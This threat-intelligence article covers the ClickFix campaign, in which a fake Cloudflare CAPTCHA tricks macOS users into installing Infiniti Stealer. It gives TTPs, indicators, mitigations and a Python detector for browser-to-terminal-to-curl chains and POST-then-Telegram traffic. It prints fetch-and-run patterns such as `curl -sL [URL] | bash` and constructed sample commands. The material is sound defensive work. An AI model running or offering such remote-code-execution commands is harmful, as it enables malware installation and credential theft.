A deceptive social engineering campaign known as ClickFix is actively targeting macOS users to distribute the Infiniti Stealer malware. The attack leverages a convincing but fake Cloudflare CAPTCHA page that tricks the user into voluntarily executing a malicious command in their own Terminal. This action initiates a multi-stage infection process that results in the deployment of Infiniti Stealer, a potent Python-based malware. The stealer is capable of harvesting a broad range of sensitive information, including browser credentials, secrets from the macOS Keychain, cryptocurrency wallet data, and developer files. The stolen data is then exfiltrated to an attacker-controlled server, with notifications sent via Telegram.
The ClickFix campaign is a clever social engineering attack that preys on user trust in familiar web security mechanisms like Cloudflare's CAPTCHA. The attack flow is as follows:
This attack is notable for its reliance on manipulating the user into being an active participant in their own compromise.
TTPs and Malware Capabilities:
- T1204.002 - Malicious File: While not a file, the attack relies on the user running malicious code from a command they are tricked into trusting.
- T1204.001 - Malicious Link: The entire infection chain is predicated on the user executing the initial command.
- T1059.004 - Unix Shell: The initial payload is a Bash script.
- T1555.003 - Credentials from Web Browsers: Steals cookies, passwords, and credit card information from various web browsers.
- T1555.001 - Keychain: Attempts to dump the contents of the macOS Keychain, which stores passwords and certificates.
- T1552.001 - Credentials In Files: Searches for files associated with cryptocurrency wallets.
- T1113 - Screen Capture: Takes screenshots of the user's desktop during execution.
- T1041 - Exfiltration Over C2 Channel: Bundles all stolen data and sends it via HTTP POST requests to a C2 server.

The use of a Nuitka loader is a clever evasion technique. By compiling the Python stealer into a binary, the attackers obfuscate the source code and make it more difficult for signature-based antivirus tools to detect.
A successful Infiniti Stealer infection can lead to a complete compromise of the victim's digital identity. The theft of browser and Keychain passwords can give attackers access to a wide range of online accounts, including email, banking, and social media. The loss of cryptocurrency wallets can result in direct and irreversible financial loss. For developers, the theft of secrets and credentials from their machine can lead to a broader supply chain attack against their employer or projects. The attack is a powerful reminder that macOS is not immune to malware and that sophisticated threats are actively targeting the platform.
| Type | Value | Description | Context | Confidence |
|---|---|---|---|---|
| url_pattern | Pages mimicking Cloudflare CAPTCHA but asking for Terminal commands | The primary lure of the ClickFix campaign. | User education, web proxy logs. | high |
| command_line_pattern | `curl -sL [URL] \| bash` | A common pattern used in the initial infection, where a script is downloaded from a URL and piped directly into bash. | EDR with command-line logging, shell history analysis. | |
| process_name | Nuitka-Loader.py or similar | The execution of a Nuitka-compiled binary may be anomalous on many systems. | Process monitoring on endpoints. | medium |
| network_traffic_pattern | Outbound POST request to unknown URL followed by connection to api.telegram.org | This pattern could indicate data exfiltration followed by the C2 notification. | EDR, network security monitoring. | medium |
`curl | bash` command, followed by further network connections and file access. Reference D3FEND technique D3-PA (Process Analysis).

The primary defense is training users to recognize that legitimate websites will never require them to execute terminal commands for verification.
In a corporate setting, use application control or execution prevention tools to block the running of unauthorized scripts and binaries.
Deploy a reputable EDR/antimalware solution for macOS that uses behavioral analysis to detect suspicious process chains like `curl | bash`.
The most effective defense against the ClickFix campaign is robust user education and awareness. This is a form of User Behavior Analysis where the user is the analyst. Security teams must train macOS users on a simple, unbreakable rule: No legitimate website, especially a security check like a CAPTCHA, will ever ask you to copy and paste a command into your Terminal. This action is equivalent to giving a stranger the keys to your house. Training materials should include screenshots of the fake Cloudflare page and explain that this is a social engineering trick to bypass all technical security controls. Empowering users to recognize and report this specific tactic is the most direct way to neutralize the threat, as the entire attack chain depends on the user's cooperation.
For technical detection, Process Analysis via an EDR solution is key. An EDR agent on the macOS endpoint can monitor for the specific, anomalous process chain created by this attack. A detection rule should be created to alert on the following sequence: a web browser process (e.g., Safari, Google Chrome) spawning a Terminal process (Terminal.app), which in turn spawns a shell (bash) that executes curl. This is a highly suspicious chain of events that rarely occurs during legitimate activity. By detecting this behavioral pattern, the EDR can alert security analysts or automatically terminate the process tree, preventing the Infiniti Stealer payload from ever being downloaded and executed. This moves the defense from relying solely on the user to having a technical backstop.
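The process chain described above, together with the `curl | bash` command-line pattern and the POST-then-Telegram network pattern from the indicator table, as an added detection example written for this page (it is not code from the page, from the campaign analysis, or from any EDR product). The event schema (pid/ppid/name/cmdline for processes, ts/pid/host/method for connections), the browser, terminal and shell name sets, the host allowlist, and every sample event are constructed assumptions; real EDR telemetry will differ in field names and in how the login shell and its children appear.

```python
"""ClickFix detection logic over constructed endpoint telemetry.

Added example, not code from the page or from any EDR product. The event
schema (pid/ppid/name/cmdline and ts/pid/host/method), the process and host
lists, and the sample events below are all constructed assumptions.
"""
import re
from collections import defaultdict

# Process-name sets used to match the chain browser -> terminal -> shell -> curl
BROWSERS = {"Safari", "Google Chrome", "firefox", "Microsoft Edge"}
TERMINALS = {"Terminal", "iTerm2"}
SHELLS = {"bash", "sh", "zsh"}

# Hosts a process may legitimately POST to (constructed allowlist)
KNOWN_HOSTS = {"api.github.com", "api.apple.com"}

# `curl ... | bash`-style pipelines, the command_line_pattern from the table
CURL_PIPE_SHELL = re.compile(r"\bcurl\b[^|]*\|\s*(?:sudo\s+)?(?:bash|sh|zsh)\b")

# Constructed process events; 203.0.113.0/24, 198.51.100.0/24 and example.invalid
# are reserved documentation values, not real infrastructure.
PROCESS_EVENTS = [
    {"pid": 100, "ppid": 1, "name": "Safari", "cmdline": "/Applications/Safari.app/Contents/MacOS/Safari"},
    {"pid": 200, "ppid": 100, "name": "Terminal", "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 300, "ppid": 200, "name": "zsh", "cmdline": "-zsh"},
    {"pid": 301, "ppid": 300, "name": "curl", "cmdline": "curl -sL https://example.invalid/loader.sh"},
    {"pid": 302, "ppid": 300, "name": "bash", "cmdline": "bash"},
    # benign: a developer's own terminal session calling an API
    {"pid": 400, "ppid": 1, "name": "Terminal", "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 401, "ppid": 400, "name": "zsh", "cmdline": "-zsh"},
    {"pid": 402, "ppid": 401, "name": "curl", "cmdline": "curl -s https://api.github.com/"},
    # command-line pattern alone, with no browser ancestry
    {"pid": 500, "ppid": 1, "name": "bash", "cmdline": "bash -c 'curl -sL https://example.invalid/x.sh | bash'"},
]

# Constructed network events (ts in seconds)
NETWORK_EVENTS = [
    {"ts": 1000.0, "pid": 700, "host": "203.0.113.10", "method": "POST"},
    {"ts": 1003.5, "pid": 700, "host": "api.telegram.org", "method": "POST"},
    {"ts": 1100.0, "pid": 800, "host": "api.github.com", "method": "POST"},   # allowlisted host
    {"ts": 1101.0, "pid": 800, "host": "api.telegram.org", "method": "POST"},
    {"ts": 1200.0, "pid": 900, "host": "198.51.100.7", "method": "POST"},
    {"ts": 1900.0, "pid": 900, "host": "api.telegram.org", "method": "GET"},   # outside the window
]


def ancestry(events, pid):
    """Process names from pid up to the root, child first."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["name"])
        pid = by_pid[pid]["ppid"]
    return chain


def _in_order(chain, groups):
    """True if walking chain (child first) meets one member of each group in turn."""
    i = 0
    for name in chain:
        if i < len(groups) and name in groups[i]:
            i += 1
    return i == len(groups)


def detect_clickfix_chain(events):
    """Flag curl with shell -> terminal -> browser ancestry, or any command line
    that pipes curl into a shell. Returns one hit per offending process."""
    hits = []
    for e in events:
        reasons = []
        if e["name"] == "curl" and _in_order(ancestry(events, e["pid"])[1:], [SHELLS, TERMINALS, BROWSERS]):
            reasons.append("browser>terminal>shell>curl ancestry")
        if CURL_PIPE_SHELL.search(e["cmdline"]):
            reasons.append("curl piped into shell on command line")
        if reasons:
            hits.append({"pid": e["pid"], "name": e["name"], "reasons": reasons})
    return hits


def detect_exfil_then_telegram(conns, window_s=60):
    """Flag a process that POSTs to a non-allowlisted host and then reaches
    api.telegram.org within window_s seconds: the exfil-then-notify sequence."""
    by_pid = defaultdict(list)
    for c in conns:
        by_pid[c["pid"]].append(c)
    hits = []
    for pid, evs in by_pid.items():
        evs.sort(key=lambda c: c["ts"])
        for i, c in enumerate(evs):
            if c["method"] != "POST" or c["host"] in KNOWN_HOSTS:
                continue
            for later in evs[i + 1:]:
                if later["ts"] - c["ts"] > window_s:
                    break
                if later["host"] == "api.telegram.org":
                    hits.append({"pid": pid, "exfil_host": c["host"], "delta_s": later["ts"] - c["ts"]})
                    break
    return hits


if __name__ == "__main__":
    for h in detect_clickfix_chain(PROCESS_EVENTS) + detect_exfil_then_telegram(NETWORK_EVENTS):
        print(h)
```

On the constructed data the chain detector fires twice, once on the curl process whose ancestry runs up through zsh and Terminal to Safari, and once on the bare `bash -c 'curl ... | bash'` command line, while the developer's ordinary `curl` from a Terminal that no browser launched stays quiet. The network detector fires only for the process that POSTs to an unknown host and then reaches api.telegram.org within the window; the allowlisted POST and the pair separated by several minutes do not match. In production the two signals are best combined, since each alone has benign look-alikes.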
In managed corporate environments, Executable Allowlisting (Application Control) provides a powerful defense. Built-in macOS tools and third-party solutions can be configured to prevent the execution of any unauthorized code. In the context of the ClickFix attack, even though the user initiates the bash script, an application control policy could prevent that script from running if it's not signed by a trusted developer or located in an approved path. This 'default-deny' stance ensures that only vetted and approved software can run, effectively blocking the execution of the Nuitka loader and the Infiniti Stealer payload, regardless of how they arrive on the system. This is a high-maturity control but is extremely effective against user-initiated malware execution.

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.